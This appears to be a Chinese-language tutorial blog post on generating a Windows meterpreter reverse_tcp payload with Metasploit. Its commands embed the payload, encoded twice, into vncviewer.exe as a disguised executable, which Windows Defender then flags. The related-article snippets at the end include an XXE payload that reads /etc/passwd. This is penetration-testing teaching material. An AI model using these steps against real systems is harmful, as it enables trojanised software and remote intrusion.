Metasploit Framework —— Payload

2024-03-07 15:58

本文主要是介绍Metasploit Framework —— Payload,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的

就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
3331d032d605b7f9aca7fbdb94887c9.png

使用:use payload/windows/meterpreter/reverse_tcp
b32d24bac71d719a87cdd7fb0ac2d0e.png

有无需要配置的地方:show options
04adee39acee01087d94259dfa38e83.png

配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
bba11668d713863598f4f5a4ca87c34.png

生成该 shellcode 的时候我们可以查看一下帮助:
43663a0ec9fc98f52651217a8d3bf7a.png

其中最常用的有:
!!!

-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…

在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
22a69391c2b1b1d102e8791e0d6918e.png

把生成的 exe 文件拉到 win10 看看:
0ca83f975c67d6007762ab5338a6631.png

好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~

😄

这篇关于Metasploit Framework —— Payload的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/784059

相关文章

Spring Framework系统框架

序号表示的是学习顺序 IoC(控制反转)/DI(依赖注入): ioc:思想上是控制反转,spring提供了一个容器,称为IOC容器,用它来充当IOC思想中的外部。 我的理解就是spring把这些对象集中管理,放在容器中,这个容器就叫Ioc这些对象统称为Bean 用对象的时候不用new,直接外部提供(bean) 当外部的对象有关系的时候,IOC给它俩绑好(DI) DI和IO

解决Metasploit调用Nessus报错问题

问题描述 Error while running command nessus_scan_new: undefined method `[]’ for nil:NilClass 解决方法 发现报错,经过网上查询解决方法 在Nessus服务器执行,下面的版本号可能有所不同,根据自己的情况更改,需要管理员身份执行。 curl "https://raw.githubuserconte

【python 爬虫】python如何以request payload形式发送post请求

普通的http的post请求的请求content-type类型是:Content-Type:application/x-www-form-urlencoded, 而另外一种形式request payload,其Content-Type为application/json import jsonurl = 'https://api.github.com/some/endpoint'payload

安卓aosp14上自由窗口划线边框Freeform Caption实战开发-千里马framework实战

背景: 上一篇文章也分享过aosp14版本上自由窗口的Caption栏的显示原理,今天来讲解一下aosp14版本上如何实现对自由窗口的划线边框功能,相关功能已经在aosp13上面进行实现,具体可以看我的分屏自由窗口专题哈。 就是想要在aosp14上面实现如下功能: 即自由窗口在被触摸放大缩小时候,边框要被画成红色的线条,表示选中。 尝试aosp13老方案: 因为aosp13是在acti

Android Framework中的PolicyManager简介

PolicyManager类位于framework\base\core\java\com\android\internal\policy目录中的PolicyManager.java文件中。PolicyManager主要用于创建Window类、LayoutInflater类和WindowManagerPolicy类,它扮演着简单工厂模式中的工厂类角色,而抽象产品角色由IPolicy接口实现,具体产

知识图谱(knowledge graph)——RDF(Resource Description Framework)

RDF的基本单元是三元组(triple) 每个三元组是(主语 谓语 宾语) 这样的元组tuple。主谓宾的取值称为"资源"(Resource, 也就是RDF里的R) 资源可以是一个网址(URI),一个字符串或数 字(严格来讲都是带类型的字符串,称为 literal),或者一个“空节点”(blank node)。 有两种特殊类型的资源。rdfs:Class代表类。 rdf:Property代

XXE payload总结

前言 关于XXE相关的一些payload的总结记录,更侧重于实战直接拿来测试利用,而非CTF绕WAF。。。 Classic XXE <?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data> 可读文

缺少各种framework会报的错误

参考: 1、关于缺少各种framework出现的错误累结

【论文】A Collaborative Transfer Learning Framework for Cross-domain Recommendation

Intro 业界常见的跨域建模方案主要分为两种范式[22][32][5][36][17][14][20]:1) 将源样本和目标样本进行联合和混合,然后执行多任务学习技术,以提高在所有域中的性能;2) 使用混合或数据丰富的源域数据预先训练模型,然后在数据不足的目标域中对其进行微调,以适应新的数据分布。在第一种方法中,通过不同类型的网络设计来学习特定域特征和域不变特征,其中域指标通常用于识别域。在微

xcode 打包framework时去除某些架构

下图所示为编译后的.framework文件: 已知该.framework支持的真机架构为arm64和armv7两种。现在想要缩小framework库的容量,只保留arm64架构。Terminal中运行: lipo MySencodeFrameWork.framework/MySencodeFrameWork -thin arm64 -output MySencodeFrameWork 模拟